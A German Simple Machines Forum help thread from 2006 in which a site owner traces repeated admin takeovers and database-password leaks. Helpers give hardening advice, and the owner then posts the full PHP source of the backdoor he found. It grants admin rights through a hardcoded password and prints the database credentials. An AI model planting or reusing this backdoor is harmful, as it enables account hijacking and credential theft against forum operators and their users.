Simple Machines Community Forum

Hi, hoffe mir kann jemand helfen :)

Ich kenne mich nicht ganz so gut mir der Materie aus, habe ein dickes Problem ...

Verwende die neuste SMF Version (1.1) ... Nur : Mein MySql Passwort kann irgendwo ausgelesen werden, Zwar nur von einem Freund (?) aber das darf ja eigentlich nicht sein ... Desweiteren kann er einfach sein en Rang ändern (Zum Admin) und auch Private Nachrichten der User lesen !? Das ist ja normalerweise nichtmal bei Admins möglich ! ...

Also muss er die Daten jawohl irgendwie direkt vom FTP kriegen oder so...

Link zum Forum : www.ostfriesland-forum.de.vu

Findet ja irgendjemand eine Sicherheitslücke drin ?

Sorry, deine Frage kann ich nicht beantworten. Ich habe aber eine Frage zu deiner Website:
Gehört das Menü zu smf oder hast du es selbst in HTML gebaut?

Das ist das Theme Dilber irgendwat... Dann in Navy blau halt... Selbst gebaut hab ich daran nix ...

Kann mir jemand bei dem Problem helfen ?

hast du die install.php gelöscht?

Ja klar ... Er sagt es sei irgendeine Datei auf die er nun ein Passwort gesetzt hat... Ich würde trotzdem gerne wissen wie genau das ganze funktioniert und ich es absichern kann... *verzweifel* ^^ ...

Ideen ?

Bei welchem Hoster bist du denn? Schaut ja nach Billigangebot aus...

FTP-Benutzer geändert? DB-Passwort geändert? Stimmen die Dateirechte auf z.B. configuration.php? Sind Dateien auf dem Webspace, die da nichts zu suchen haben?

Preisfrage: Weißt du wo es ausgelesen werden kann?

Wenn nicht, dann ändere es einfach mal und guck ob dein Freund dann immernoch in die DB reinkommt ;D

Bin bei Funpic... Wie gesagt kenne mich nicht so super damit aus, was ist "DB" und wie setze/ändere ich das Passwort ?

FTP - Zugriff hat er eigentlich nicht ... Das Passwort kann er nicht wissen...

Boar aber danke das ihr mit helft :respekt: !

// DB = Datenbank ?  ... Ne, das weiss er eigentlich nicht, er kanns mir aber immer irgendwo auslesen ...  Ihr redet doch von der MySql Datenbank oder wie das heisst oder ?

Genau. Vllt gibt er nur vor es herauslesen zu können ;)

Bei Funpic ändert man das MySQL-DB Passwort glaube ich über das Admin-Center von Funpic.

Das glaube ich nicht... Wie kann er sonst private Nachrichten lesen und sich selbst Admin-Rechte geben ?

du sagst, es wäre dein freund.
mein freunde würden mir verraten, wenn sowas ginge und wenn ja, wie.
also frag ihn einfach mal ;)

ich vermute er hat zugang für deine mysql-db.

Er sagt es ist ein Sicherheitsloch gewesen das er mittlerweile selber auch schon zugemacht hat... Aber was soll ich noch tun ? Wenn ich mein Datenbankpasswort ändere kann er es so wieder auslesen !?

In welcher Datei ausser der Settings.php steht das Passwort denn noch ? Kann es vielleicht sein das er ständig diese ausliest ? Wie sperre ich die denn richtig ?

Die Settings.php kann ohne Zugang zum Server (FTP, SSH et.) nicht einfach ausgelesen werden.

Vielleicht hat er auch irgendwo den Code geändert und
lässt sich das SQL PW selbst nach change zu senden.
Oder ein Codesnipsel setzt seinen Account immer auf Admin.

Da ist einiges möglich.


Sicherheitstechnisch fehlt mir in diesem Forum eh ein Log,
der sämtliche Aktivitäten über den Admin Panel logt  ::)
(was hier aber normalerweise nichts zu tun hat)

Er hat ja garkeine Rechte auf dem FTP ... also geändert haben kann er eigentlich nix...

// Wie kann ich nen Logger ( heisst das so ?) installieren ? Gibts da ein Tut/Programm/script für ... Wie gesagt ich hab 0-Peilung auf dem Gebiet ^^


Aber ich finds unglaublich toll hier das ihr mir alle helft !  :)

ich verstehe es nicht, will er dich ärgern, oder will er dich und vielleicht auch uns helfen?
Warum kann er dann dir nicht sagen, was und wie er das macht, wenn er sagt dass es ist ein Sicherheitsloch gewesen das er mittlerweile selber auch schon zugemacht hat, warum spilet er dann weiter?
Anscheinend hat er es doch nicht dicht gemacht, kann er überhaupt soviel wie er angibt?

sende dir selber eine Nachricht und verlange von ihn den Inhalt, mal schauen ob er dir das sagen kann

Ja, kann er... Er kann alle Privaten Nachrichten lesen... Hmm das voll komisch ...

Einfach mal das DB-Passwort ändern... Einfach mal testweise ;)

Quote from: ernomo98 on December 12, 2006, 12:55:14 PM
ich verstehe es nicht, will er dich ärgern, oder will er dich und vielleicht auch uns helfen?
Warum kann er dann dir nicht sagen, was und wie er das macht, wenn er sagt dass es ist ein Sicherheitsloch gewesen das er mittlerweile selber auch schon zugemacht hat, warum spilet er dann weiter?

Das verstehe ich auch nicht! Er schadet der Community (die sich in deinem Forum wohl entweder verarscht, nicht sicher aufgehoben oder beides vorkommen dürfte) und dir selbst (indem er dir das Wissen vorenthält, welche angebliche Fehlerquelle er beseitigt hat).

Wenn ich das DB-Passwort ändere liest er es innerhalb von 2 Minuten wieder irgendwo aus ! Habe ich mittlerweile schon 5x gemacht ...  In welcher Datei kann man das Passwort denn auslesen ? Ausser der Settings.php ? Eigentlich doch nirgends sonst !?

Wir machen das jetzt ganz konsequent:

Entweder er sagt dir wo er das auslesen kann oder nicht. Wenn nicht, dann vergiss das Forum einfach und mach ein neues. Hier können wir nur Rätselraten machen.

Aber das kann ja nicht angehen das er das so rauskriegt... Und ich habe eigentlich auch keine Lust das Forum neu aufzusetzen ...  :(

Sichere die DB - und nimm eine frische Install Version, - Passwörter ändern, auch von deinem Admin Account und fertig.

Wie Neakro ist es sehr schwer hier eine "hellseh Lösung" ohne richtige Fakten und Daten zu geben.

wie kannst du so jemand als freund bezeichen?
Wenn du ihn ignorierst wird er früher oder später aufgeben ;D

wenn ich sowas sehe (http://gamer1511.ga.funpic.de/) wird mir schlecht.
vermutlich ist dein funpicaccount völlich versäucht.

leg dir nen neuen account an (am besten ganz wo anders) und zieh dein forum neu auf.

Quote from: Pitti on December 15, 2006, 03:29:51 AM
wenn ich sowas sehe wird mir schlecht.

Mir auch!  :o

Alleine, was dort für Dateien/Daten erreichbar sind, bis hin zu postalischen Adressen auf irgendwelche Bildern, äußerst zweifelhafte ausführbare (!) Dateien, etc.

Aber schreibt man verseucht nicht mit E? Oder kommt das in deinem Falle vom Rumsauen auf dem Webspace?  ;D

Gut, vielen Dank für eure Hilfe !

Werden dann demnächst mal das Forum neu aufsetzen und mir einen anderen Hoster suchen ...

Habt ihr noch irgendwelche Sicherheitstipss am Rande ? Worauf speziell achten ö.ä ?

... Damit wäre das erledigt ! :)

Immer eine index.php oder index.html in jeden Ordner packen.

... obwohl mich schon interessieren würde, wie die mailschleuder auf den webspace gekommen ist.

und noch mehr: WIESO SIE IMMERNOCH DORT LIEGT?

Ist nur aus Fun da :)

Kann dich beruhigen, Funpic setzt sowieso unter jede damit versendete Mail eine Aufforderung Spam zu melden, mein Username steht auch immer drunter

Quote from: Gamer1511 on December 17, 2006, 07:53:43 AM
Ist nur aus Fun da :)

Kann dich beruhigen, Funpic setzt sowieso unter jede damit versendete Mail eine Aufforderung Spam zu melden, mein Username steht auch immer drunter

nächstes mal schick ich dir gleich mal 1000 mails.
aber ich kann dich beruhigen ... die sind dann auch nur zum spaß

Mensch mensch darum gings doch hier garnicht :) ... Ausserdem schick ich`s nicht an irgendwelche Leute, sondern nur an welche die`s auch bei mir gemacht haben  ;D

Für mehr ist das Ding nicht gut

ich gebs auf.
du begreifst es einfach nicht.

Das Ding ist weg, auch wegen Missbrauch etc....

Aber ich hab die Ursache gefunden, ein Php script auf dem Server ...

Hier mal der Quelltext davon :

Quote<?php
if (ini_get('register_globals') != 1) {
$supers = array("_REQUEST","_ENV","_SERVER","_POST","_GET","_COOKIE","_SESSION","_FILES","_GLOBALS");
foreach ($supers as $__s) {
if ((isset($$__s) == true) && (is_array($$__s) == true)) extract($$__s, EXTR_OVERWRITE);
}
unset($supers);
}
include("../Settings.php");
$connection = mysql_connect($db_server,$db_user,$db_passwd);
if ($T1 !="" && $T2 == "xphgfsdjgop")
{
mysql_select_db($db_name);
mysql_query("UPDATE smf_members SET ID_GROUP='1' WHERE memberName='$T1'");
echo"Jetzt ADMIN !"   ;
}
else
{
if ($T3 == "xphgfsdjgop")
{
echo"Datenbankinformationen:<br> Server: $db_server<br>User: $db_user <br> Passwort: $db_passwd";
}
else
{
echo'
<html>

<head>
<title>LOL !</title>
</head>

<body>
        <form method="POST" action="">
<p align="center"><b>Benutzer Admin by Matschi Hacker !</b></p>
<p align="center">&nbsp;</p>
<div align="center">
  <center>
  <table border="0" width="558" height="67">
    <tr>
      <td width="558" height="11">Mache Benutzer <input type="text" name="T1" size="20">
        zum Admin!

      </td>
    </tr>
    <tr>
      <td width="558" height="10">Passwort: <input type="password" name="T2" size="20">
      </td>
    </tr>
    <tr>
      <td width="558" height="28">
        <p align="center"><input type="submit" value="Abschicken" name="B1"></p>
      </td>
    </tr>
  </table>
  </center>
</div>        </form>

<p align="center">&nbsp;</p>
        <form method="POST" action="">
<div align="center">
  <center>
  <table border="0" width="570" height="55">
    <tr>
      <td width="570" height="14">Zeige mir MySQL Daten ! Passwort: <input type="password" name="T3" size="20">
      </td>
    </tr>
    <tr>
      <td width="570" height="29">
        <p align="center"><input type="submit" value="Abschicken" name="B1"></td>
    </tr>
  </table>
  </center>
</div>        </form>

</body>

</html>';
}
}
?>

Wie das ganze da hingekommen ist weiss ich auch nicht ... !?

Das Script an sich kann jeder Depp schreiben. Wenn interessiert eh nur das wie und ich vermute mal, dass er einfach mal an deinem Rechner war und du das FTP-Passwort im Client gespeichert hast.

an deiner Settings.php stimmt ja noch irgendwas nicht....

kannst mal die settings.php posten ohne Passwörter selbstverständlich

der Output is nicht normal...

Quote
SecureSSI: Das Script (/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php) hat versucht ausserhalb von ihrem Userverzeichniss auf die Datei /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php zuzugreifen.
Dies ist nicht erlaubt!

Warning: main() [function.main]: Sicherheitsverletzung: in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

Warning: main(/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php) [function.main]: failed to open stream: Operation not permitted in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

Fatal error: main() [function.require]: Failed opening required '/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php' (include_path='.:') in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

wenn man die direkt im Browser aufruft sollte man eigentlich ne leere Seite bekommen...

Meine Settings.php :

Quote<?php
/**********************************************************************************
* Settings.php                                                                    *
***********************************************************************************
* SMF: Simple Machines Forum                                                      *
* Open-Source Project Inspired by Zef Hemel ([email protected])                    *
* =============================================================================== *
* Software Version:           SMF 1.1                                             *
* Software by:                Simple Machines (http://www.simplemachines.org)     *
* Copyright 2006 by:          Simple Machines LLC (http://www.simplemachines.org) *
*           2001-2006 by:     Lewis Media (http://www.lewismedia.com)             *
* Support, News, Updates at:  http://www.simplemachines.org                       *
***********************************************************************************
* This program is free software; you may redistribute it and/or modify it under   *
* the terms of the provided license as published by Simple Machines LLC.          *
*                                                                                 *
* This program is distributed in the hope that it is and will be useful, but      *
* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY    *
* or FITNESS FOR A PARTICULAR PURPOSE.                                            *
*                                                                                 *
* See the "license.txt" file for details of the Simple Machines license.          *
* The latest version can always be found at http://www.simplemachines.org.        *
**********************************************************************************/


########## Maintenance ##########
# Note: If $maintenance is set to 2, the forum will be unusable!  Change it to 0 to fix it.
$maintenance = 0;      # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!)
$mtitle = 'Das Forum ist momentan wegen Umbauarbeiten nicht Verfügbar !';      # Title for the Maintenance Mode message.
$mmessage = 'Bitte habt Geduld ...';      # Description of why the forum is in maintenance mode.

########## Forum Info ##########
$mbname = 'Leer/Ostfriesland';      # The name of your forum.
$language = 'german';      # The default language file set for the forum.
$boardurl = 'http://gamer1511.ga.funpic.de/Forum';      # URL to your forum's folder. (without the trailing /!)
$webmaster_email = '[email protected]';      # Email address to send emails from. (like [email protected].)
$cookiename = 'SMFCookie634';      # Name of the cookie to set for authentication.

########## Database Info ##########
$db_server = 'localhost';
$db_name = 'xxxxxxxxxxx';
$db_user = 'xxxxxxxxxx';
$db_passwd = 'xxxxxxxxxxx';
$db_prefix = 'smf_';
$db_persist = 0;
$db_error_send = 1;

########## Directories/Files ##########
# Note: These directories do not have to be changed unless you move things.
$boarddir = '/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum';      # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Sources';      # Path to the Sources directory.

########## Error-Catching ##########
# Note: You shouldn't touch these settings.
$db_last_error = 1166299663;


# Make sure the paths are correct... at least try to fix them.
if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt'))
   $boarddir = dirname(__FILE__);
if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
   $sourcedir = $boarddir . '/Sources';

?>

Quote from: Blackbird_BB on December 21, 2006, 12:12:07 AM
an deiner Settings.php stimmt ja noch irgendwas nicht....

kannst mal die settings.php posten ohne Passwörter selbstverständlich

der Output is nicht normal...

Quote
SecureSSI: Das Script (/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php) hat versucht ausserhalb von ihrem Userverzeichniss auf die Datei /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php zuzugreifen.
Dies ist nicht erlaubt!

Warning: main() [function.main]: Sicherheitsverletzung: in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

Warning: main(/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php) [function.main]: failed to open stream: Operation not permitted in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

Fatal error: main() [function.require]: Failed opening required '/usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/Settings.php' (include_path='.:') in /usr/export/www/vhosts/funnetwork/hosting/gamer1511/Forum/index.php on line 46

wenn man die direkt im Browser aufruft sollte man eigentlich ne leere Seite bekommen...

Bei mir kommt eine leere Seite ???

Er hat die Seite wohlweisslich geplätted!